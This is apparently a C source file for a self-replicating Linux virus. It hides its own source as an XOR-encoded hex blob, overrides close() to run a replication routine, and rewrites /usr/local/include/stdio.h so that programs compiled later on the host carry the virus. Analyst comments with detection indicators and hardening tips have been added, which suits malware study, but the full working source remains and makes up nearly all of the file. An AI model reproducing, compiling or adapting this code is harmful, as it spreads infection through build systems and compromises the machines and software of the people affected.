📄 vsrc2.c
"\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f\x72\x20\x28"
"\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x20\x6c\x65\x6e\x3b"
"\x20\x69\x2b\x2b\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x09\x73\x5b\x69\x5d\x20\x5e\x3d\x20\x6b\x65"
"\x79\x5b\x6a\x5d\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x6a\x20\x3d\x20\x28\x6a\x20\x2b"
"\x20\x31\x29\x20\x25\x20\x34\x3b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74"
"\x75\x72\x6e\x20\x30\x3b\x0a\x7d\x0a\x0a\x69\x6e\x74\x20\x6d"
"\x75\x74\x61\x74\x65\x28\x63\x68\x61\x72\x20\x2a\x73\x29\x0a"
"\x7b\x0a\x20\x20\x20\x09\x69\x6e\x74\x20\x66\x64\x2c\x20\x69"
"\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20"
"\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f"
"\x72\x20\x28\x69\x20\x3d\x20\x30\x3b\x20\x69\x20\x3c\x20\x34"
"\x3b\x20\x69\x2b\x2b\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x09\x69\x66\x20\x28\x28\x66\x64\x20\x3d"
"\x20\x6f\x70\x65\x6e\x28\x22\x2f\x64\x65\x76\x2f\x72\x61\x6e"
"\x64\x6f\x6d\x22\x2c\x20\x4f\x5f\x52\x44\x4f\x4e\x4c\x59\x29"
"\x29\x20\x3c\x3d\x20\x30\x29\x20\x7b\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x09"
"\x70\x65\x72\x72\x6f\x72\x28\x22\x6f\x70\x65\x6e\x22\x29\x3b"
"\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72"
"\x6e\x20\x65\x72\x72\x6e\x6f\x3b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65"
"\x61\x64\x28\x66\x64\x2c\x20\x26\x73\x5b\x69\x5d\x2c\x20\x31"
"\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x43\x6c\x6f\x73\x65\x28\x66\x64\x29\x3b\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x0a\x7d\x0a"
"\x20\x20\x20\x20\x20\x20\x20\x20\x0a";
/* this is the key for the encryption and will be
* changed with every infection
* and must be 0 at start
*/
/*
 * Analysis note: 4-byte repeating XOR key applied to the C[] blob by Crypt().
 * It is all-zero in this first-generation source, so the first Crypt() call
 * is a no-op on the plaintext blob. Each generated header stores the current
 * key in cleartext next to the encoded blob (see the fprintf of key[0..3] in
 * virfunc), so an analyst can decode any sample's blob with the key found in
 * the same file.
 */
char key[4] = {0};
/*BEGIN-line*/
/* this is where the hex code that is displayed above begins */
/* this is the new close() that replaces the one in the stdio.h
* library, as can be seen it executes the virus functionality
* before it closes the file
*/
/*
 * Analysis note: file-scope definition named close() that takes the place of
 * the C library's close(2) in any program compiled together with this code.
 * (close(2) is normally declared in <unistd.h>; the definition reaches
 * programs through the rewritten stdio.h that virfunc() generates.)
 * Every call first runs virfunc(), then performs the real close via Close().
 *
 * Detection hint: a binary that defines its own `close` symbol instead of
 * importing it from libc is unusual and worth inspecting.
 */
int close(int fd)
{
virfunc(); /* run the header-rewriting routine before closing */
return Close(fd); /* real close, issued as a raw system call */
}
/* this is the old close() function renamed Close() and
* executed only after the virus has been executed
*/
/*
 * Issues the close system call directly through the "int $0x80" software
 * interrupt (the 32-bit x86 Linux system-call entry) instead of going through
 * libc, because the name close() is taken by the hook above.
 *
 * Returns the kernel's result when it is non-negative; otherwise stores the
 * negated result in errno and returns -1.
 */
int Close(int i)
{
long __res;
/* eax carries __NR_close in and the result out; ebx carries the descriptor */
__asm__ volatile ("int $0x80"
: "=a" (__res)
: "0" (__NR_close),"b" ((long)(i)));
if (__res >= 0)
return (int)__res;
/* a negative result is treated as -errno */
errno = -__res;
return -1;
}
/* this executes the virus */
/*
 * Analysis note: the replication routine. Runs at most once per process
 * (guarded by the static flag `first`) and regenerates
 * /usr/local/include/stdio.h so that it contains:
 *   1. an #include of the genuine /usr/include/stdio.h plus the headers and
 *      prototypes this code needs,
 *   2. the C[] blob re-encoded under a freshly drawn 4-byte key,
 *   3. that key in cleartext,
 *   4. the decoded blob written out as text (presumably the source from the
 *      BEGIN-line marker onward - confirm against the decoded C[]).
 * Always returns 0.
 *
 * Why it matters: on typical GCC configurations /usr/local/include is
 * searched before /usr/include, so later compilations on the host would pick
 * up the planted header instead of the system one.
 *
 * Indicators for defenders:
 *   - a file /usr/local/include/stdio.h, especially one that includes
 *     "/usr/include/stdio.h" and defines `char C[]` and `unsigned char key[4]`;
 *   - binaries defining the symbols close, Close, virfunc, Crypt or mutate
 *     (unless stripped);
 *   - unexpected unlink/create activity under /usr/local/include.
 * The mkdir/unlink/open calls need write access to /usr/local/include, so
 * keeping that tree root-owned, integrity-monitored, and not building or
 * running untrusted code as root limits the spread.
 */
int virfunc(void)
{
FILE *fd;
static int first = 0;
int i = 0, j = 1, oldmask = 0;
/* already ran in this process: do nothing */
if (first)
return 0;
/* clear the umask so the 0755 / 0644 modes below are applied unmodified */
oldmask = umask(0);
/* decode C[] with the current key (a no-op while key is all zero) */
Crypt(C, CHARS);
/* make this directory if it does not already exist */
mkdir("/usr/local/include", 0755);
/* remove any existing header at the target path */
unlink("/usr/local/include/stdio.h");
/* open stdio.h for writing */
/* NOTE(review): on failure only perror() is called and execution continues
 * with fd == NULL, so the fprintf calls below receive a NULL stream; a host
 * program without write access would likely crash here, which is itself an
 * observable symptom.
 */
if ((fd = fdopen(open("/usr/local/include/stdio.h", O_CREAT|O_RDWR, 0644), "w+")) == NULL)
perror("fopen");
/* first write the #defines etc. from the beginning of this code
 * to the new stdio.h; the first line chains to the genuine system header
 * so that programs including <stdio.h> still compile normally
 */
fprintf(fd, "#include \"/usr/include/stdio.h\"\n"
"#include <fcntl.h>\n"
"#include <linux/unistd.h>\n"
"#include <sys/stat.h>\n"
"#include <unistd.h>\n"
"#include <errno.h>\n"
"#include <string.h>\n"
"#define CHARS %d\n\n"
"int virfunc(void);\n"
"int Close(int);\n"
"int mutate(char*);\n"
"int Crypt(char*, int);\n\n"
"char C[] = \n\"", CHARS);
/* draw a new 4-byte key from /dev/random */
mutate(key); /* change the key */
/* encrypt C[] */
Crypt(C, CHARS); /* encrypt the hex with the new key */
/* emit the encoded blob as \xNN escapes, breaking the string literal
 * periodically (j counts escapes on the current output line)
 */
for (i = 0; i < CHARS; i++) {
if ((j % 15) == 0) {
fprintf(fd, "\"\n\"");
j = 0;
}
fprintf(fd, "\\x%02x", (unsigned char)C[i]);
j++;
}
fprintf(fd, "\";\n\n");
/* write the key in cleartext, right after the blob it encodes */
fprintf(fd, "\n\nunsigned char key[4] = {0x%02x, 0x%02x, 0x%02x, 0x%02x};\n\n",
(unsigned char)key[0], (unsigned char)key[1],
(unsigned char)key[2], (unsigned char)key[3]);
/* decrypt C[] and write as string to stdio.h */
Crypt(C, CHARS);
fprintf(fd, "%s", C);
fclose(fd); /* close stdio.h */
/* mark as done for this process and restore the caller's umask */
first = 1;
umask(oldmask);
return 0;
}
/* the procedure for encrypting and decrypting the hex portion */
/*
 * XORs the first `len` bytes of `s` in place with the global 4-byte `key`,
 * cycling through the key bytes. The operation is its own inverse, so the
 * same call both encodes and decodes; with an all-zero key it leaves the
 * buffer unchanged. Always returns 0.
 *
 * Analysis note: this is obfuscation rather than encryption. The key is
 * only four bytes long and is stored next to the blob in each generated
 * header, so the blob can be decoded directly for inspection or signature
 * writing.
 */
int Crypt(char *s, int len)
{
int i = 0, j = 0;
for (i = 0; i < len; i++) {
s[i] ^= key[j]; /* XOR with the key */
j = (j + 1) % 4; /* wrap to the start of the 4-byte key */
}
return 0;
}
/* mutate (change) the key */
/* (I hope the target has /dev/random) */
/*
 * Overwrites s[0..3] with bytes read from /dev/random, opening and closing
 * the device once per byte. The descriptor is released with Close(), the raw
 * system-call wrapper, not the hooked close(), so this does not re-enter
 * virfunc(). A descriptor value <= 0 from open() is treated as failure.
 *
 * Returns 0 after four iterations, or errno if /dev/random cannot be opened.
 *
 * Analysis note: because the key changes on every run, the encoded C[] blob
 * differs between generated headers; the fixed text around it (the include
 * lines, prototypes and function names) does not.
 */
int mutate(char *s)
{
int fd, i;
for (i = 0; i < 4; i++) {
if ((fd = open("/dev/random", O_RDONLY)) <= 0) {
perror("open");
return errno;
}
/* one byte per open; the result of read() is not examined */
read(fd, &s[i], 1);
Close(fd);
}
return 0;
}
/* main portion of program that executes upon first execution
* of virus
*/
/*
 * First-generation entry point: prints a banner and then calls the hooked
 * close() on an invalid descriptor (-11). The call exists only to run
 * virfunc() once; the subsequent Close(-11) is expected to fail, and its
 * result becomes the process exit status.
 */
int main(void)
{
printf("Cool! Started. Now you should have the new stdio.h\n"
"in /usr/local/include directory.\n\n"
"************************************\n"
"This virus is dedicated to Doreen.\n"
"Hope i'll see her again. :'(\n"
"************************************\n");
/* the descriptor is deliberately invalid; only the hook's side effect matters */
return close(-11);
}